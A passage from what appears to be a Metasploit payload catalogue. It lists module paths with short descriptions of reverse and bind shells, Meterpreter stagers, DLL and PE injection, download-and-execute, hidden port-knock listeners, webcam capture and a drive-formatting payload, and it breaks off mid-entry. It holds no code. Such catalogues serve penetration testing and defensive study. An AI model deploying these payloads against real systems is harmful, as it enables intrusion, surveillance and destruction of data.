descriptor\nlinux/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)\nlinux/x86/shell/bind_ipv6_tcp_uuid Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)\nlinux/x86/shell/bind_nonx_tcp Spawn a command shell (staged). Listen for a connection\nlinux/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection (Linux x86)\nlinux/x86/shell/bind_tcp_uuid Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)\nlinux/x86/shell/find_tag Spawn a command shell (staged). Use an established connection\nlinux/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to attacker over IPv6\nlinux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker\nlinux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell\nlinux/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nlinux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\nlinux/x86/shell_find_port Spawn a shell on an established connection\nlinux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nlinux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nlinux/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6\nlinux/zarch/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nlinux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nmainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.\nmulti/meterpreter/reverse_http Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP\nmulti/meterpreter/reverse_https Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS\nnetware/shell/reverse_tcp Connect to the NetWare console (staged). Connect back to the attacker\nnodejs/shell_bind_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp Creates an interactive shell via nodejs\nnodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL\nosx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/armle/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.\nosx/ppc/shell/bind_tcp Spawn a command shell (staged). Listen for a connection\nosx/ppc/shell/find_tag Spawn a command shell (staged). Use an established connection\nosx/ppc/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker\nosx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, execute\nosx/x64/dupandexecve/reverse_tcp_uuid dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/exec Execute an arbitrary command\nosx/x64/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect, read length, read buffer, execute\nosx/x64/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)\nosx/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)\nosx/x64/say Say an arbitrary string outloud using Mac OS X text2speech\nosx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port\nosx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)\nosx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/bundleinject/bind_tcp Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute\nosx/x86/bundleinject/reverse_tcp Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute\nosx/x86/exec Execute an arbitrary command\nosx/x86/isight/bind_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute\nosx/x86/isight/reverse_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute\nosx/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nosx/x86/shell_find_port Spawn a shell on an established connection\nosx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\nosx/x86/vforkshell/bind_tcp Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute\nosx/x86/vforkshell/reverse_tcp Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute\nosx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell\nosx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell\nphp/bind_perl Listen for a connection and spawn a command shell via perl (persistent)\nphp/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6\nphp/bind_php Listen for a connection and spawn a command shell via php\nphp/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)\nphp/download_exec Download an EXE from an HTTP URL and execute it\nphp/exec Execute a single system command\nphp/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection\nphp/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6\nphp/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support\nphp/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support\nphp/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\nphp/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)\nphp/reverse_perl Creates an interactive shell via perl\nphp/reverse_php Reverse PHP connect back shell with checks for disabled functions\nphp/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably agood idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.\npython/meterpreter/bind_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection\npython/meterpreter/bind_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support\npython/meterpreter/reverse_http Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP\npython/meterpreter/reverse_https Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL\npython/meterpreter/reverse_tcp Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker\npython/meterpreter/reverse_tcp_ssl Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL\npython/meterpreter/reverse_tcp_uuid Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support\npython/meterpreter_bind_tcp Connect to the victim and spawn a Meterpreter shell\npython/meterpreter_reverse_http Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_https Connect back to the attacker and spawn a Meterpreter shell\npython/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell\npython/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\npython/pingback_reverse_tcp Connects back to the attacker, sends a UUID, then terminates\npython/shell_bind_tcp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.\npython/shell_reverse_tcp_ssl Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\npython/shell_reverse_udp Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.\nr/shell_bind_tcp Continually listen for a connection and spawn a command shell via R\nr/shell_reverse_tcp Connect back and create a command shell via R\nruby/pingback_bind_tcp Listens for a connection from the attacker, sends a UUID, then terminates\nruby/pingback_reverse_tcp Connect back to the attacker, sends a UUID, then terminates\nruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby\nruby/shell_reverse_tcp Connect back and create a command shell via Ruby\nruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL\nsolaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/sparc/shell_find_port Spawn a shell on an established connection\nsolaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell\nsolaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell\nsolaris/x86/shell_find_port Spawn a shell on an established connection\nsolaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell\ntty/unix/interact Interacts with a TTY on an established socket connection\nwindows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)\nwindows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)\nwindows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/dllinject/bind_named_pipe Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)\nwindows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)\nwindows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)\nwindows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection\nwindows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)\nwindows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection\nwindows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as ahop.\nwindows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)\nwindows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. Tunnel communication over HTTP\nwindows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6\nwindows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)\nwindows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support\nwindows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)\nwindows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload\nwindows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it\nwindows/exec Execute an arbitrary command\nwindows/format_all_drives This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume.\nwindows/loadlibrary Load an arbitrary library path\nwindows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon\nwindows/meterpreter/bind_hidden_ipknock_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. Thesocket will appear as "closed," thus helping to hide the shellcode\nwindows/meterpreter/bind_hidden_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/meterpreter/bind_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x86)\nwindows/meterpreter/bind_ipv6_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/meterpreter/bind_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x86)\nwindows/meterpreter/bind_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (No NX)\nwindows/meterpreter/bind_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x86)\nwindows/meterpreter/bind_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection\nwindows/meterpreter/bind_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x86)\nwindows/meterpreter/find_tag Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Use an established connection\nwindows/meterpreter/reverse_hop_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/meterpreter/reverse_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows wininet)\nwindows/meterpreter/reverse_http_proxy_pstore Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP\nwindows/meterpreter/reverse_https Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows wininet)\nwindows/meterpreter/reverse_https_proxy Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support\nwindows/meterpreter/reverse_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker over IPv6\nwindows/meterpreter/reverse_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/meterpreter/reverse_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (No NX)\nwindows/meterpreter/reverse_ord_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_allports Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/meterpreter/reverse_tcp_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support\nwindows/meterpreter/reverse_winhttp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows winhttp)\nwindows/meterpreter/reverse_winhttps Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows winhttp)\nwindows/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nwindows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nwindows/patchupdllinject/bind_hidden_ipknock_tcp Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupdllinject/bind_hidden_tcp Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupdllinject/bind_ipv6_tcp Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)\nwindows/patchupdllinject/bind_ipv6_tcp_uuid Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/patchupdllinject/bind_named_pipe Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)\nwindows/patchupdllinject/bind_nonx_tcp Inject a custom DLL into the exploited process. Listen for a connection (No NX)\nwindows/patchupdllinject/bind_tcp Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)\nwindows/patchupdllinject/bind_tcp_rc4 Inject a custom DLL into the exploited process. Listen for a connection\nwindows/patchupdllinject/bind_tcp_uuid Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)\nwindows/patchupdllinject/find_tag Inject a custom DLL into the exploited process. Use an established connection\nwindows/patchupdllinject/reverse_ipv6_tcp Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6\nwindows/patchupdllinject/reverse_nonx_tcp Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)\nwindows/patchupdllinject/reverse_ord_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_allports Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupdllinject/reverse_tcp_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4 Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_uuid Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support\nwindows/patchupmeterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupmeterpreter/bind_hidden_tcp Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupmeterpreter/bind_ipv6_tcp Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)\nwindows/patchupmeterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/bind_named_pipe Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)\nwindows/patchupmeterpreter/bind_nonx_tcp Inject the meterpreter server DLL (staged). Listen for a connection (No NX)\nwindows/patchupmeterpreter/bind_tcp Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)\nwindows/patchupmeterpreter/bind_tcp_rc4 Inject the meterpreter server DLL (staged). Listen for a connection\nwindows/patchupmeterpreter/bind_tcp_uuid Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/find_tag Inject the meterpreter server DLL (staged). Use an established connection\nwindows/patchupmeterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6\nwindows/patchupmeterpreter/reverse_nonx_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)\nwindows/patchupmeterpreter/reverse_ord_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support\nwindows/peinject/bind_hidden_ipknock_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection.First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you couldget your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/peinject/bind_hidden_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connectionfrom a hidden port and spawn a command shell to the allowed host.\nwindows/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection (Windows x86)\nwindows/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a pipe connection (Windows x86)\nwindows/peinject/bind_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(No NX)\nwindows/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(Windows x86)\nwindows/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection\nwindows/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connectionwith UUID Support (Windows x86)\nwindows/peinject/find_tag Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Use an established connection\nwindows/peinject/reverse_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker over IPv6\nwindows/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker via a named pipe pivot\nwindows/peinject/reverse_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker (No NX)\nwindows/peinject/reverse_ord_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_allports Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/peinject/reverse_tcp_dns Inject a custom native 